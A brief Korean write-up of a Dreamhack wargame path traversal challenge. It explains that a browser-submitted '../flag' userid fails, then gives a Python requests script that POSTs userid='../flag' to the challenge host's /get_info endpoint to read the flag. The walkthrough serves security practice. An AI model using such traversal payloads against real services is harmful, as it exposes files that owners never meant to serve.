드림핵 pathtraversal 롸업

userid에 ../flag를 넣어서 pathtraversal 취약점을 이용하려고 했는데 안된다.

값이 넘어갈 때 flag를 포함하면 undefined로 처리되어서 넘어가는 것 같다.

import requests
url="http://host3.dreamhack.games:8821/get_info"
data={"userid":"../flag"}
res=requests.post(url=url, data=data)
print(res.text)

이렇게 공격 코드를 짜서 실행하면

flag가 나온다.